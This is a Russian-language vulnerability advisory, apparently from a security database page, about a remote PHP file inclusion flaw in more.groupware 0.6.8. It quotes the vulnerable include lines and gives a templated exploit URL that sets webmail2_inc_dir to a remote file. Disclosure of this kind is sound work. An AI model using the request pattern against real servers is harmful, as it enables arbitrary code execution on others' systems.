Удаленное выполнение произвольного PHP кода в 'more.groupware'

Дата публикации:
25.07.2003
Всего просмотров:
658
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файла обнаружена в 'more.groupware'. Удаленный пользователь может выполнить произвольный код на целевой системе.

Если удаленный сервер обрабатывает .inc файлы, то удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы, на целевом сервере с привилегиями Web сервера. Уязвимые сценарии:

class.html.mime.mail.inc @ line 38
-----------------------------------------------
require_once($webmail2_inc_dir.'mimepart.php');
-----------------------------------------------

rfc822.php @ line 20
-----------------------------------------------
require_once($webmail2_inc_dir.'pear.php');
-----------------------------------------------

webmail2_func.inc @ line 32 | Variable:
?appconf[rootpath]
-----------------------------------------------
$webmail2_inc_dir =
$appconf["rootpath"]."/modules/webmail2/inc/";
include $webmail2_inc_dir."mime_types.php";
-----------------------------------------------
Пример:

http://[server]/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include]

Уязвимость обнаружена в more.groupware 0.6.8

Ссылки: More.Groupware Remote Include Vulnerability

или введите имя

CAPTCHA